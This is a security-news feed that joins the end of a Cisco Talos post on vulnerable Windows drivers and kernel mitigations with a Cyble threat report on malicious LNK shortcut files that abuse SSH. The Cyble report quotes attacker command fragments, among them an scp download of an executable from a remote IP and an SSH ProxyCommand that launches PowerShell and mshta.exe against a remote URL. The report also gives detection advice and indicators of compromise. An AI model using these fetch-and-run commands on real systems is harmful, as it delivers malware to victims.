In addition to documenting different classes of vulnerabilities in frequently used BYOVD drivers, we also investigated the most common payloads delivered by threats and potentially unwanted applications after exploiting vulnerable drivers and classified them into several groups including local escalation privileges, loading of unsigned code and bypassing EDR functionality.   

Modern Windows mitigations and vulnerable drivers 

Loading malicious code into kernel memory is one of the most powerful payloads attackers can use. This approach was frequently employed in the early days of Windows, prior to Windows Vista, when there were no requirements to sign drivers. The ability to load unsigned code into kernel mode was an incentive for the creation of several Windows kernel rootkits, such as Sinowal or TDL4, designed to hide the presence of malicious payloads from defenders by modifying kernel programs and data structures.  

To respond to those threats and kernel exploitation in general, Microsoft introduced kernel patch protection (KPP), better known as Patch Guard, in x64 versions of Windows XP SP3. This was followed by the requirement for drivers to be signed in x64 Windows Vista.  

The introduction of the mitigations into the Windows kernel sparked a race between threat actors and Microsoft. Attackers quickly responded to newly introduced mitigations by showing how digital signature enforcement can be turned off in a race with the Patch Guard, and Microsoft responded with more mitigations. Over time, the exploitation of Windows kernels became increasingly challenging.   Next, we will briefly describe only four significant anti-exploitation features implemented with Windows 10 and 11.  

Virtualization-Based Security (VBS) 

Virtual Trust Levels (VTLs) are a key concept within Virtualization-Based Security (VBS), designed to enhance system security by creating isolated execution environments. VTLs leverage hardware virtualization to separate and protect sensitive processes from potentially less secure code running in the main operating system. 

VTLs are essentially different security levels or “worlds” within the same physical machine, each providing a different level of trust. The main goal of VTLs is to isolate trusted operations and data from the rest of the system to prevent tampering. In Windows, there are two main VTL levels.  

• VTL0: This is the standard trust level, where the traditional operating system and all user-mode and kernel-mode applications run.  

• VTL1: This is a higher trust level used to execute sensitive security functions and store critical data. It is isolated from VTL0, meaning that operations in VTL0 cannot directly access or modify the code and data in VTL1. VTL1 is used to store sensitive information like encryption keys, password hashes, and security tokens (credentials guard).  

 

Exploring vulnerable Windows drivers
High level architecture of Virtualization-based security concepts, credit: Windows Internals 7th edition, part 1

 By running different parts of the kernel in different trust levels, effectively different virtual machines, Windows can use Second Level Address Translation (SLAT) to create different access permissions for memory pages depending on the source of access.  

Essentially, in a process similar to shadowing page tables, VBS enforces exclusive write or execute page access permission. In other words, if a code from VTL0 attempts to change its own page table permissions from writable to executable this will be detected by the VTL1 and the data in the page still won’t be able to execute.  

This mechanism is one of the key features of another important mitigation, Hypervisor-Protected Code Integrity (HVCI). 

Hypervisor-Protected Code Integrity (HVCI) 

When Hypervisor-protected Code Integrity (HVCI) is enabled on a Windows system, it enforces control over memory page permissions to mitigate executable code injection. HVCI is designed so that only verified and trusted code is executed in kernel mode, and it applies policies to manage how memory pages can be used and modified. 

One of the important features enforced by HVCI (and supported by modern CPUs) is the prevention of pages being simultaneously writable and executable. This policy is known as Write XOR Execute (W^X), which prevents memory pages from being both writable and executable at the same time.  

HVCI prevents direct execution of code from pages that were recently writable, unless specific security checks are passed. Before any code can execute from a page that has had its permissions altered, it must pass a code integrity check, ensuring it is signed by a trusted certificate. If the code does not meet these integrity requirements, execution will be blocked. HVCI attempts to ensure that any code running in kernel mode is signed with a valid certificate.  

Kernel Control Flow Guard (kCFG) 

Kernel Control Flow Guard (kCFG) is a security feature in Windows designed to protect the operating system’s kernel from certain types of attacks that attempt to manipulate the control flow of kernel-mode code. It builds on the principles of Control Flow Guard (CFG), used to secure user-mode applications. 

kCFG aims to prevent exploits that involve redirecting the control flow of kernel code to unintended or malicious locations which should prevent exploits that hijack the control flow by overwriting function pointers and other data used for indirect code execution.  

During the compilation of the Windows kernel, kCFG instruments the code to create valid address bitmap and any indirect call must finish at a target known at compile time. If the call is directed outside know target the system will cause a security check failure.   

Kernel shadow stack 

The primary purpose of the Windows kernel shadow stack is to ensure that the return addresses on the call stack cannot be tampered with, specifically to mitigate exploitation using Return Oriented Programming (ROP). 

The shadow stack maintains a separate, copy of return addresses parallel to the regular call stack. When a function call occurs, the return address is pushed onto both the regular stack and the shadow stack. Upon function return, the system verifies the return address against the shadow stack to ensure it has not been altered. The shadow stack in Windows is hardware assisted for better performance through Intel Control-Flow Enforcement Technology (CET) and AMD Shadow Stacks.  

Conclusion 

In recent years, Windows platform security has improved to effectively prevent deployment of newly developed malicious drivers. However, kernel mode threats of vulnerable legacy drivers remain a concern. Luckily there are a few things we can do to mitigate the risks and detect potential campaigns using BYOVD technique. 

This could include enforcement of Extended Validation (EV) and Windows Hardware Quality Labs (WHQL) certified drivers, preventing risks associated with legacy drivers. If the blocking of all legacy drivers is not possible, employing the Windows Defender Application Control (Windows Security) drivers blocklist is recommended way to prevent the execution of known vulnerable drivers. 

Apart from the above, for threat detection and response, it recommended to develop a capability to monitor driver load events, such as those recorded by Sysmon’s event ID 6.  

In summary, while Windows security has improved, maintaining vigilance against kernel mode threats requires adoption of best practices and monitoring techniques to protect against known and unknown driver vulnerabilities.  

References and further reading 

Posts and papers 

  1. Exploring Malicious Drivers Part 1 – Cisco Talos 
  2. Exploring Malicious Drivers Part 2 – Cisco Talos 
  3. The Current State of Exploit Development, Part 1 – Connor McGarr, Crowdstrike 
  4. The Current State of Exploit Development, Part 2 – Connor McGarr, Crowdstrike 
  5. No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG – Connor McGarr 
  6. Signed kernel drivers – Unguarded gateway to Windows’ core – Michal Poslušný, ESET 
  7. An In-Depth Look At Windows Kernel Threats – TrendMicro 
  8. Windows security model for driver developers – Microsoft 
  9. Driver Signing Policy – Microsoft  
  10. Driver code signing requirements – Microsoft 

Videos 

  1. A Look at Modern Windows Kernel Exploitation/Hacking – Off By One Security podcast with Connor McGarr 
  2. Windows Internals – By Alex Sotirov 
  3. Kernel Mode Threats and Practical Defenses – Joe Desimone, Gabriel Landau, Endgame (now Elastic) 
  4. Device Driver Debauchery and MSR Madness – Ryan Warns, Timothy Harrison – INFILTRATE 2019  
  5. No Code Execution? No Problem!  – Connor McGarr 
  6. Get Off the Kernel if You Can’t Drive – Jesse Michael, DEF CON 27 Conference  

Books 

  1. Windows Internals 7th Edition – Pavel Yosifovich, Alex Ionescu, Mark E. Russinovich, David A. Solomon, Published by Microsoft Press 
  2. Windows NT Device Driver Development – Peter G. Viscarola & W. Anthony Mason, Published by New Riders Publishing 
  3. Windows Kernel Programming – Pavel Yosifovich, Published by Pavel Yosifovich 

Cisco Talos Blog – ​Read More

LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks

Cyble - Transparent Tribe

Overview

Starting this year, Cyble Research and Intelligence Labs (CRIL) has observed a significant trend where threat actors (TAs) have increasingly leveraged LNK files as an initial infection vector in multiple campaigns. These malicious shortcut files, often disguised as legitimate documents, have become a preferred entry point for attackers seeking to compromise systems. This shift in tactics aims to bypass traditional security mechanisms and deceive users into executing the malicious LNK file, thereby initiating a multi-stage cyber attack to deploy the final payload.

In these campaigns, the LNK files are meticulously crafted to execute commands using multiple Living-off-the-Land Binaries (LOLBins). By exploiting the inherent functionalities of these binaries, attackers can download or execute additional malicious components, thereby advancing their attack chain.

While modern endpoint detection and response (EDR) solutions have evolved to detect such activities by monitoring the behavior of LNK files and flagging suspicious use of known LOLBin binaries, this has led TAs to refine their techniques to bypass these advanced security measures.

Recently, CRIL uncovered an additional layer of sophistication in these attacks: the use of SSH commands within malicious LNK files to execute a range of malicious activities. This emerging technique highlights how threat actors leverage SSH commands to maintain persistence and control over compromised systems.

While the malicious use of SSH is not a new tactic, its ongoing relevance as an evasion technique underscores the need for continuous vigilance in monitoring trusted utilities for anomalous behavior.

Pivoting on the identified SSH abuse techniques, CRIL has tracked several campaigns where SSH commands were exploited to carry out malicious operations, further emphasizing the evolution of attack methods. Notably, APT groups have also incorporated this technique into their arsenal, highlighting their growing use in sophisticated cyber campaigns.

SSH using the SCP command

In this campaign, a malicious .LNK file is configured to execute SSH commands that use the scp (Secure Copy Protocol) command to download a malicious file and execute it on the local system. The image below illustrates the contents of the .LNK file.

Figure 1 – Contents of the .LNK file

The use of SSH commands and SCP on Windows systems is relatively less, which may allow malicious activity to go undetected by traditional security solutions that are not specifically configured to monitor such behavior.

The .LNK file is configured with the following SSH options to facilitate the attack:

  • -o “PermitLocalCommand=yes”: Allows the execution of a local command once the SSH connection is established.
  • -o “StrictHostKeyChecking=no”: Disables host key verification, bypassing prompts or errors when connecting to untrusted servers.

Once the SSH connection is established, the SSH client executes the SCP command:

  • scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:userspublic

This command downloads a malicious file named christmas-sale.exe from the /home/revenge directory on the remote server to the local directory c:userspublic. The downloaded file is then executed, advancing the attack chain.

Abuse of SSH and PowerShell Commands

In this campaign, a malicious .LNK file is configured to execute an SSH command that indirectly runs a malicious PowerShell command. The .LNK file utilizes a ProxyCommand option in the SSH command to execute PowerShell, which then invokes mshta.exe to access a remote malicious URL. The execution of this command allows the attacker to download and execute a potentially harmful payload on the local system. The image below shows the contents of the .LNK file.

Figure 2 – Contents of the .LNK File

The .LNK file is configured with the following SSH options:

  • -o ProxyCommand=”powershell powershell -Command (‘mshta.exe https://www.google.ca/amp/s/goo.su/IwPQJP’

The SSH client executes the PowerShell command, which runs mshta.exe to fetch and execute the malicious script from the specified URL.

Abuse of SSH and CMD Commands

In this campaign, a malicious .LNK file is crafted to execute an SSH command, which then triggers rundll32 to load a malicious DLL and launch a PDF file (lure document), both located in the current directory. The image below illustrates the contents of the .LNK file.

Figure 3 – Contents of the LNK file

The SSH client executes cmd.exe, which in turn launches the rundll32 utility to load the malicious DLL and execute the PDF, advancing the attack chain.

By analyzing the artifacts and DLL payload associated with this campaign, we observed behavior resembling stealer malware compiled in Go, which we previously discussed in a blog targeting the Indian Air Force. Additionally, another article highlights similar behavior, attributing the stealer payload (HackBrowserData—an open-source tool) to the APT group ‘Transparent Tribe’.

Conclusion

The combination of LNK files and SSH commands has emerged as a notable trend in recent campaigns, signaling a shift in the tactics used by threat actors. By leveraging SSH commands in conjunction with various LOLBins, attackers can establish connections to remote servers, download payloads, and maintain persistence on compromised systems. As demonstrated in the analyzed campaigns, these techniques are continuously evolving, with threat actors refining their methods to evade detection by exploiting trusted system utilities. As the cyber threat landscape progresses, organizations must remain vigilant and adapt their security strategies to effectively counter these increasingly sophisticated attack vectors.

The Sigma rule to detect these campaigns leveraging SSH commands is available for download from the GitHub repository. 

Recommendations

  • To mitigate potential SSH abuse, closely monitor the activities of the legitimate SSH utility, restrict its usage to authorized users, and implement robust detection mechanisms to identify suspicious activities involving ssh.exe, particularly those with abnormal or malicious command-line parameters.
  • Disable OpenSSH features on systems where it is not required.

Indicators of Compromise (IoCs)

Indicators Indicator Type Description
8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494 SHA-256 Lnk file – Campaign 1
5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 SHA-256 Lnk file – Campaign 2
0016e1ec6fc56e4214e7d54eb7ab3d84a4a83b4befd856e984d77d6db8fc221d SHA-256 Lnk file – Campaign 3

References

https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/

https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors

https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign

The post LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks appeared first on Cyble.

Blog – Cyble – ​Read More